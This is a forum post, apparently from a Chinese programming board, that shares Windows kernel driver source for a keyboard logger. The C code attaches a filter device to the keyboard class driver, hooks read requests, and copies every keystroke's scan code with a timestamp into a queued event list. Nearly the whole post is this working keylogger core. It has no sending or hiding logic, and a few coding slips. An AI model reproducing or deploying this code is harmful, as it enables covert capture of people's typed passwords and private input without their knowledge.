|
阅读:1289回复:0
发段键盘记录代码吧,大牛们别笑啊
NTSTATUS CreateKeyboardObj(IN PDRIVER_OBJECT DriverObj, IN PUNICODE_STRING RegtryPath,PDEVICE_OBJECT* PtrReturnedDeviceObject)
{ NTSTATUS NtStatus = STATUS_SUCCESS; PDEVICE_OBJECT pDeviceObject = NULL, pFilteredDevice = NULL; UNICODE_STRING usDeviceToFilter; PDEVICE_OBJECT pTargetDeviceObject = NULL; PFILE_OBJECT pTargetFileObject = NULL; PKEYBOARD_EXTENSION pDevExt; //////////////////////////////////////////////////////////// RtlInitUnicodeString(&usDeviceToFilter, L"\\Device\\KeyboardClass0"); NtStatus = IoGetDeviceObjectPointer( IN &usDeviceToFilter, IN FILE_ALL_ACCESS, OUT &pTargetFileObject, OUT &pTargetDeviceObject ); if( !NT_SUCCESS(NtStatus) ) { DbgPrint(("EventRec.SYS:: Couldn't Get the Keyboard Device Object\n")); pTargetFileObject = NULL; pTargetDeviceObject = NULL; return( NtStatus ); } DbgPrint("IoGetDeviceObjectPointer ok!\n"); ////////////////////////////////////////////////////////////////////////// NtStatus = IoCreateDevice(DriverObj, sizeof(PKEYBOARD_EXTENSION), NULL, FILE_DEVICE_KEYBOARD,//pTargetDeviceObject->DeviceType, pTargetDeviceObject->Characteristics, FALSE, &pDeviceObject); if( !NT_SUCCESS(NtStatus) ) { DbgPrint(("EventRec.SYS: failed to create Keyboard filter device!\n")); RtlFreeUnicodeString( &usDeviceToFilter ); ObDereferenceObject( pTargetFileObject ); pTargetFileObject = NULL; return STATUS_SUCCESS; } // pDevExt=ExAllocatePool(NonPagedPool, sizeof( PKEYBOARD_EXTENSION ) ); // (PKEYBOARD_EXTENSION )( pDeviceObject->DeviceExtension )= pDevExt ; pDevExt = (PKEYBOARD_EXTENSION) pDeviceObject->DeviceExtension; pDevExt->pFilterDeviceObject = pDeviceObject; pDevExt->TargetDeviceObject = pTargetDeviceObject; DbgPrint(("IoCreateDevice: Create Keyboard filter \n")); NtStatus = IoAttachDeviceByPointer(pDeviceObject,pTargetDeviceObject); if( !NT_SUCCESS(NtStatus) ) { DbgPrint(("EventRec.SYS: Couldn't attach to Keyboard Device Object\n")); IoDeleteDevice( pDeviceObject ); pDeviceObject = NULL; ObDereferenceObject( pTargetFileObject ); pTargetFileObject = NULL; pTargetDeviceObject = NULL; return( NtStatus ); } DbgPrint(("IoAttachDeviceToDeviceStack: Attach Device OK \n")); /////////////////////////////////// DbgPrint(("EventRec.SYS: Attach Device\n")); pDeviceObject->DeviceType = pTargetDeviceObject->DeviceType; pDeviceObject->Characteristics = pTargetDeviceObject->Characteristics; pDeviceObject->Flags |= (DO_BUFFERED_IO | DO_POWER_PAGABLE);; //////////////////////////////////// DbgPrint(("EventRec.SYS: Before Dereference TargetFileObject \n")); ObDereferenceObject( pTargetFileObject ); pTargetFileObject = NULL; /// return NtStatus; } NTSTATUS KeyboardRead(PDEVICE_OBJECT DeviceObject, PIRP Irp) { PIO_STACK_LOCATION IrpStack; // PIO_STACK_LOCATION NextIrpStack; PKEYBOARD_EXTENSION pExt; NTSTATUS NtStatus = STATUS_SUCCESS; // DbgPrint("KeyboardRead Called \r\n"); pExt = (PKEYBOARD_EXTENSION)DeviceObject->DeviceExtension; IrpStack = IoGetCurrentIrpStackLocation(Irp); IoCopyCurrentIrpStackLocationToNext(Irp); IoSetCompletionRoutine(Irp, (PIO_COMPLETION_ROUTINE) KeyboardReadCompletion, NULL, TRUE, TRUE, TRUE); NtStatus = IoCallDriver(pExt->TargetDeviceObject, Irp); // DbgPrint("KeyboardRead Exit 0x%0x \r\n", NtStatus); return NtStatus; } NTSTATUS KeyboardReadCompletion(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp,IN PVOID Context) { PIO_INF inf; PKEYBOARD_INPUT_DATA KeyData; ULONG numKey,i; NTSTATUS NtStatus = STATUS_SUCCESS; ULONG SizeTotal; PUCHAR pTmp; TIME_FIELDS *timeFields = NULL; LARGE_INTEGER Now; ULONG len; PRECORD_EVENT pEvent; // DbgPrint("Keyboard Read Completion OK \n"); if (Irp->PendingReturned) { IoMarkIrpPending(Irp); } if (Irp->IoStatus.Status==STATUS_SUCCESS && g_bStartMon!=0) { PIO_STACK_LOCATION cur; cur = IoGetCurrentIrpStackLocation(Irp); KeyData = Irp->AssociatedIrp.SystemBuffer; numKey = Irp->IoStatus.Information / sizeof(KEYBOARD_INPUT_DATA); /* DbgPrint("%d keystrokes ", numKey ); for( i = 0; i < numKey; i++ ) { DbgPrint("ScanCode: 0x%0x ", KeyData.MakeCode ); DbgPrint("Flags: 0x%0x\r\n", KeyData.Flags ); } */ SizeTotal= sizeof(IO_INF)+sizeof(TIME_FIELDS)+Irp->IoStatus.Information; len = sizeof(LIST_ENTRY)+sizeof(ULONG)+SizeTotal; // DbgPrint("SizeTotal=%x Information=%x ", SizeTotal, Irp->IoStatus.Information); pEvent = (PRECORD_EVENT)ExAllocatePool(NonPagedPool,len); // DbgPrint("%d Keyboard AllocatePool 0x%x INF 0x%x\n",numKey,len,SizeTotal); //////////// inf = (PIO_INF)(pEvent->EventData); inf->type=REQ_KEYBOARD; inf->SizeCopied=Irp->IoStatus.Information; inf->SizeTotal=SizeTotal; pTmp= pEvent->EventData+sizeof(IO_INF); timeFields=(TIME_FIELDS *)(pTmp); KeQuerySystemTime(&Now); RtlTimeToTimeFields(&Now, timeFields); pTmp=pEvent->EventData+sizeof(IO_INF)+sizeof(TIME_FIELDS); if(inf->SizeCopied) { RtlCopyMemory(pTmp,Irp->AssociatedIrp.SystemBuffer,inf->SizeCopied); } ////////// pEvent->Len = SizeTotal; ExInterlockedInsertTailList(&EventList, &(pEvent->ListEntry),&EventListLock); // DbgPrint("Keyboard Compeltion OK\n"); } return STATUS_SUCCESS; } |
|
